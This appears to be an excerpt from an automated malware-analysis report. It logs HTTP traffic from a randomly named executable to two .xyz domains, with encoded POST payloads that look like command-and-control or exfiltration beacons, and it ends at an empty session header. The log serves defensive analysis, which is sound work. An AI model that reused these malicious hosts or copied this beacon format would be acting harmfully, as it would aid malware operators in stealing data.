                                                                                                                                  6192.168.2.553171103.106.67.112801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:11.025197983 CEST773OUTPOST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 70 6a 68 63 56 2b 71 38 36 59 43 46 72 74 43 39 68 5a 2b 57 46 43 5a 74 48 66 36 34 45 6f 56 42 5a 2b 32 42 44 72 6c 64 35 6a 4a 46 49 71 2b 4b 68 56 52 2b 58 47 76 31 4b 47 58 47 72 72 5a 65 78 6b 4e 4e 74 52 78 30 33 77 7a 7a 6b 46 45 78 4d 4d 52 49 53 43 45 50 7a 7a 46 39 4d 54 4b 50 30 48 76 65 49 58 37 53 4d 59 36 41 7a 66 4b 46 61 67 68 6e 45 30 74 75 31 76 6b 4a 79 39 39 58 34 42 78 62 46 6e 58 57 46 38 6b 68 5a 4d 49 34 79 6d 58 79 72 41 78 53 52 64 61 75 41 6d 4d 71 6d 46 44 67 5a 30 46 38 39 36 30 43 69 41 42 4c 52 53
                                                                                                                                  Data Ascii: DrelH=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahpjhcV+q86YCFrtC9hZ+WFCZtHf64EoVBZ+2BDrld5jJFIq+KhVR+XGv1KGXGrrZexkNNtRx03wzzkFExMMRISCEPzzF9MTKP0HveIX7SMY6AzfKFaghnE0tu1vkJy99X4BxbFnXWF8khZMI4ymXyrAxSRdauAmMqmFDgZ0F8960CiABLRS
                                                                                                                                  Oct 22, 2024 22:57:11.758527994 CEST245INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:11 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.553184103.106.67.112801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:13.579629898 CEST1790OUTPOST /hshp/ HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.sailforever.xyz
                                                                                                                                  Referer: http://www.sailforever.xyz/hshp/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 78 6a 68 75 74 2b 6f 65 53 59 44 46 72 74 65 4e 68 59 2b 57 46 54 5a 74 2f 54 36 34 34 43 56 46 70 2b 33 69 4c 72 6a 76 52 6a 43 46 49 71 6a 61 68 49 56 2b 58 54 76 31 36 43 58 46 44 72 5a 65 78 6b 4e 4c 70 52 68 51 6a 77 31 7a 6b 4b 44 78 4d 49 62 6f 53 71 45 4f 62 4a 46 39 41 70 4b 2b 55 48 73 36 73 58 33 45 77 59 6e 77 7a 5a 4c 46 62 6c 68 6e 49 6e 74 71 73 55 6b 4b 75 58 39 51 4d 42 38 76 59 37 47 55 31 2f 77 53 4e 58 50 2b 61 58 4e 69 61 73 76 42 4d 75 59 64 6f 66 47 4c 76 73 4a 47 78 77 46 2b 6f 51 67 58 53 4c 48 74 5a 62 63 33 56 4b 69 58 37 76 74 33 5a 4d 4c 34 6c 49 30 6b 75 57 51 61 68 67 53 39 59 47 6c 46 4b 70 78 70 35 74 62 55 4d 32 67 48 33 39 55 48 65 6f 51 70 47 46 52 31 44 4b 64 47 32 74 6a 53 50 6e 47 42 6e 73 51 6f 41 68 54 76 7a 6b 59 47 68 59 64 69 56 62 63 6a 2b 70 61 67 74 67 57 42 59 59 6d 7a 67 4c 2b 6f 42 42 50 30 35 6a 76 61 6f 34 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=BDKkReVOQWAWHre7k29F1wzx2iXhT+FegcXK0vUuahxjhut+oeSYDFrteNhY+WFTZt/T644CVFp+3iLrjvRjCFIqjahIV+XTv16CXFDrZexkNLpRhQjw1zkKDxMIboSqEObJF9ApK+UHs6sX3EwYnwzZLFblhnIntqsUkKuX9QMB8vY7GU1/wSNXP+aXNiasvBMuYdofGLvsJGxwF+oQgXSLHtZbc3VKiX7vt3ZML4lI0kuWQahgS9YGlFKpxp5tbUM2gH39UHeoQpGFR1DKdG2tjSPnGBnsQoAhTvzkYGhYdiVbcj+pagtgWBYYmzgL+oBBP05jvao4to2+wN6hDzZ28DAF5g5RyQLy0JunrnWjmlCwns1uEdkmZ6il9EAXEwtIAsaGlIbphc1XDb8uzhqqTpqqs8Y16EpRGRe9N+z2+f6z6Xn75e2gHsAaBpcZ9d1ublUbKTmj6A8ArXG0qTn3pFrYq1fWbiecXJKT83lGiv1+UCmnIVdddH3BtFSMWcRY7sPz5MC9+b5lw8xBXGmmW2ZcT9yKBnmngBTyOD4gOjkURn4ZT+1uM2jUVH1uq2ACSxry49JzsRL8wUbNIRovfaaTsemLIxTVnCDQq+KFZwYgQTFu9W7U7IgQStF1ro3N2J4uaMjHfmOWgUYSSBQdGol4XvQStvBfVa6WQRjGs/j7c/EskLHdS2+BrfKUCFjGloN93fk2ZNt2sp70zInmFHmSaNMVnhm5pYgzJ0jqt9U9xr6Id1tUyyTw84u9lu+4AxFXD/9aw6b9MUIjtXgiJBwUyUfoks+o6FPEstZGrNl400fJqBM94/JWjY4gxu2HtQBINkgdOaFitZoLtywkYrU6I9BxzgLG+EWR8ckDqvXxCSyDtv4rSdh4DOBZMCrqSF9bDGh7CMNyXL7GZfNrB6TyuWLS/jMbFjQALfpqGTtABQNhVSrd30z+jexQMc4Q+uZFz1rSSWPEmM3ZHQIvUAon4wc1CxWJTPzAjO36GC [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:57:14.293406963 CEST245INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:14 GMT
                                                                                                                                  Content-Length: 0
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.553196103.106.67.112801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:16.120002985 CEST484OUTGET /hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.sailforever.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:57:16.886214018 CEST645INHTTP/1.1 302 Found
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Location: https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&Sx=gnM4ZH
                                                                                                                                  Server: Dynamic Http Server
                                                                                                                                  X-Ratelimit-Limit: 101
                                                                                                                                  X-Ratelimit-Remaining: 100
                                                                                                                                  X-Ratelimit-Reset: 1
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:16 GMT
                                                                                                                                  Content-Length: 209
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 61 69 6c 66 6f 72 65 76 65 72 2e 78 79 7a 2f 68 73 68 70 2f 3f 44 72 65 6c 48 3d 4d 42 69 45 53 72 30 68 50 6d 67 56 46 75 53 44 67 54 31 73 39 32 6a 65 77 48 58 31 54 73 38 42 6a 66 4c 75 73 39 30 4f 61 67 4e 67 68 50 31 62 6f 71 79 35 47 41 54 57 43 63 6b 50 37 32 52 2f 4d 74 36 64 77 72 41 62 4e 6c 78 71 67 33 7a 57 6b 36 5a 41 4c 33 49 37 39 4a 4e 6b 55 4d 58 76 75 31 37 61 64 30 2b 2f 61 4b 68 61 62 4f 70 4c 33 78 76 30 31 7a 51 31 49 78 39 63 45 4c 33 57 5a 41 3d 3d 26 61 6d 70 3b 53 78 3d 67 6e 4d 34 5a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                  Data Ascii: <a href="https://www.sailforever.xyz/hshp/?DrelH=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAL3I79JNkUMXvu17ad0+/aKhabOpL3xv01zQ1Ix9cEL3WZA==&amp;Sx=gnM4ZH">Found</a>.


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.553212188.114.96.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:21.987476110 CEST765OUTPOST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 61 64 33 48 36 65 32 66 71 72 32 70 75 2f 6a 57 62 75 65 38 5a 45 47 4b 6e 61 5a 45 54 4a 64 51 4c 33 35 32 41 52 70 4c 79 38 53 4e 64 30 65 32 64 44 79 6f 46 6b 55 57 42 75 6e 77 5a 32 6f 69 61 64 4d 6c 47 74 76 6a 7a 6c 64 4d 6b 44 37 35 32 34 38 72 59 73 47 44 50 4d 57 42 63 4a 76 50 42 2f 64 65 6c 7a 61 41 46 34 45 34 32 61 49 51 52 62 33 4f 56 6e 52 55 55 4d 6b 57 6c 48 69 53 49 2f 4a 42 38 69 6f 57 79 42 79 52 59 63 57 48 47 39 46 33 78 42 39 68 75 44 42 61 6d 75 71 50 6e 34 51 32 56 53 42 4f 51 35 78 6a 32 6f 41 74 66 6b 63 68 59 62 50 63 61 57 63 3d
                                                                                                                                  Data Ascii: DrelH=nW04OhvCZUUGad3H6e2fqr2pu/jWbue8ZEGKnaZETJdQL352ARpLy8SNd0e2dDyoFkUWBunwZ2oiadMlGtvjzldMkD75248rYsGDPMWBcJvPB/delzaAF4E42aIQRb3OVnRUUMkWlHiSI/JB8ioWyByRYcWHG9F3xB9huDBamuqPn4Q2VSBOQ5xj2oAtfkchYbPcaWc=
                                                                                                                                  Oct 22, 2024 22:57:22.858637094 CEST998INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:22 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g17BlI2XQDR7Yw4E2bZjNqXNLYUGG6gDzX9YiuUwyut7cLBegf0T4C0Ug02aDn2WopUjAv9PHYI%2BnQL%2FhsS0ZPolswgDJnbqw4%2FrUbbmDSKjtFDyf2nhnZ5vmrXdo4a4W1WTgQfQ6Obu4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c663bc80d4662-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1288&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=765&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.553213188.114.96.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:24.530455112 CEST785OUTPOST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 226
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 35 51 4b 58 4a 32 42 51 70 4c 78 38 53 4e 49 45 65 2f 41 7a 79 68 46 6b 6f 6f 42 73 7a 77 5a 79 34 69 61 64 38 6c 48 65 48 67 79 31 64 43 78 7a 37 2f 37 59 38 72 59 73 47 44 50 50 71 72 63 4a 6e 50 42 72 68 65 6b 58 4f 48 49 59 45 2f 68 71 49 51 47 72 33 4b 56 6e 52 36 55 4e 6f 73 6c 46 61 53 49 2b 5a 42 38 78 77 52 34 42 79 54 58 38 58 56 47 66 67 6b 39 33 39 78 71 78 46 53 6d 74 65 6e 76 75 39 63 50 77 4a 6d 44 5a 64 62 6d 37 49 61 4f 55 39 49 43 34 66 73 45 42 4b 73 62 64 2f 75 77 4f 36 55 68 71 66 4c 6e 6c 49 7a 39 66 50 59
                                                                                                                                  Data Ascii: DrelH=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT75QKXJ2BQpLx8SNIEe/AzyhFkooBszwZy4iad8lHeHgy1dCxz7/7Y8rYsGDPPqrcJnPBrhekXOHIYE/hqIQGr3KVnR6UNoslFaSI+ZB8xwR4ByTX8XVGfgk939xqxFSmtenvu9cPwJmDZdbm7IaOU9IC4fsEBKsbd/uwO6UhqfLnlIz9fPY
                                                                                                                                  Oct 22, 2024 22:57:25.453141928 CEST998INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:25 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFX6P1PjLgt0ExkCo76f%2F44F0yoJ2dKiNxMnfh%2FmxLZV3p2EYxCqwENV5FtDEyuv5hjJauO3OkT8gfRnTvL6CE2JXPqOm6FJ6JLp3%2BUMezX3wSrMs6qSUv5fCkGAlTTbexMw3SaQHpamOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c664baf2ce972-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=785&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.553214188.114.96.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:57:27.231601000 CEST1802OUTPOST /bd77/ HTTP/1.1
                                                                                                                                  Host: www.launchdreamidea.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.launchdreamidea.xyz
                                                                                                                                  Referer: http://www.launchdreamidea.xyz/bd77/
                                                                                                                                  Content-Length: 1242
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 78 51 4b 6b 78 32 4f 54 78 4c 77 38 53 4e 4a 45 65 79 41 7a 7a 68 46 6b 77 6b 42 73 2f 4b 5a 30 6b 69 62 2b 30 6c 41 76 48 67 38 31 64 43 7a 7a 37 36 32 34 39 6a 59 76 75 48 50 4d 53 72 63 4a 6e 50 42 71 78 65 6a 44 61 48 4b 59 45 34 32 61 4a 52 52 62 32 74 56 6e 5a 4d 55 4e 74 52 6b 31 36 53 52 65 70 42 2b 44 6f 52 30 42 79 4e 57 38 57 51 47 66 64 38 39 33 4a 39 71 77 77 4a 6d 74 32 6e 2f 36 63 55 58 7a 4e 6e 51 34 63 34 32 70 74 34 63 54 34 72 41 4c 37 64 41 6a 65 51 55 39 37 64 77 36 32 49 70 4c 2b 44 2b 78 59 2b 2f 34 57 50 33 6b 6d 34 64 57 6f 4e 38 48 39 4c 67 58 6e 36 6c 4a 6c 33 6e 70 6c 4e 79 68 6a 56 4f 4d 45 4a 30 41 68 4b 4d 31 49 2f 56 48 6f 2b 48 4d 70 5a 44 41 74 38 4e 38 6f 45 2f 4c 73 30 2b 5a 73 6d 51 51 59 4c 63 67 32 51 49 78 54 6b 32 6e 53 74 68 79 6b 4c 37 6a 4a 54 41 41 32 36 4a 69 71 79 6b 48 2f 31 68 74 4a 62 74 2b 54 7a 61 38 64 70 [TRUNCATED]
                                                                                                                                  Data Ascii: DrelH=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT7xQKkx2OTxLw8SNJEeyAzzhFkwkBs/KZ0kib+0lAvHg81dCzz76249jYvuHPMSrcJnPBqxejDaHKYE42aJRRb2tVnZMUNtRk16SRepB+DoR0ByNW8WQGfd893J9qwwJmt2n/6cUXzNnQ4c42pt4cT4rAL7dAjeQU97dw62IpL+D+xY+/4WP3km4dWoN8H9LgXn6lJl3nplNyhjVOMEJ0AhKM1I/VHo+HMpZDAt8N8oE/Ls0+ZsmQQYLcg2QIxTk2nSthykL7jJTAA26JiqykH/1htJbt+Tza8dp5sapBrWzlmE8ALli2Qx6ng2sIPHYKRnvGForYDF9Llqx/K1EON2ecxzAVN5N+c/aZ97h9qnv+3rccjgT2Q9GXk2eSQbwGs73WcAByaInTIH67ZII/NW3hsnfw9GidHIHS9wRumgTtobLsmnqM66h001L8FNxI3+MoDkPXbopaJQR4Qo3FLtguhz538am7wvKgyXq2Aa3qt+LZq3ahIh90X2C8TqayXdbiGdq6wvuFfc+UJawlr6SqLuX8P+LzrMmiCtQ8mVNyv02aBi2EefxXFYLCS3DBigF/P3RvuwRDRZeePJydbwsRcjTfskeDycayxOsH76eOoDIIvtna1DjrinYP0PwtZzZI/pIXGoCy93Qm5cWkpe8KPXl4qBsz/+01rn0NHJ5m3OfaIZLDKR8+ksf6vXiGTuPuCoOjeSz07WbYI08Bqw76z6wqTCVx+BP1E6QhorYbwB1dDHr+QHyROgDpEnwiqs4iR6VTO/DBXXKPiyNr2Kh9ZwsvLoAqn+hJexL/E5Z6aQE5A4q/lqkwTXYO67+2rVW79polN5E/UxYVydJZhS8Emx8jHRC+c7I+Vl4yiUtqgFXbYKZlXMvg1dTTxYN0iCp+NvWUhqwgryknVaKx5aSJpCZ0t+gXO72zQ0xl/qct+0v3X1TS+SivlWd1ojt8q7Lse [TRUNCATED]
                                                                                                                                  Oct 22, 2024 22:57:28.092438936 CEST1001INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Tue, 22 Oct 2024 20:57:28 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  vary: accept-encoding
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmH9ifoe%2FMIhysmT3ZRaPky0FeAqEjW4w8b6A0LMBAjdLg66wwufg8QrKzkwsqUuJ1zgMSLb8HpUQaaMbW0b9L5wXMFtx9Urq52Su2Nt3Jo%2Bqc394ps%2FWYIyuHH3UbvIx%2FAc2G7QqgNrbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c665c795728ab-DFW
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1615&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1802&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 62 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e b1 0a c2 30 10 86 f7 42 df e1 dc 74 68 d3 40 07 87 23 8b 28 38 e8 22 3e 40 ea 9d 4d 20 4d 4a 4c c1 be bd 54 2d 88 b3 a3 d3 c1 ff 7f ff c7 a1 49 9d 53 79 86 86 35 29 4c 36 39 56 75 55 c3 31 24 d8 85 c1 13 8a 57 88 e2 89 e4 19 36 81 c6 e9 5e d8 27 8e 0a 8d fc 5e 18 a9 50 bc eb c9 1d d5 0c fb d6 fa bb 90 a5 5c 97 15 2c cf cd e0 d3 b0 fa 64 c5 6c 17 f3 67 8b a2 00 0d bd 26 b2 be 85 14 80 ec 4d 37 8e e1 70 da 6f 41 7b 82 8d 89 a1 63 b8 46 cb 9e dc 08 1c 63 88 d0 eb 96 a1 28 fe 8a 5f 2b 1e 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: b70Bth@#(8">@M MJLT-ISy5)L69VuU1$W6^'^P\,dlg&M7poA{cFc(_+*I540


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.553215188.114.96.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
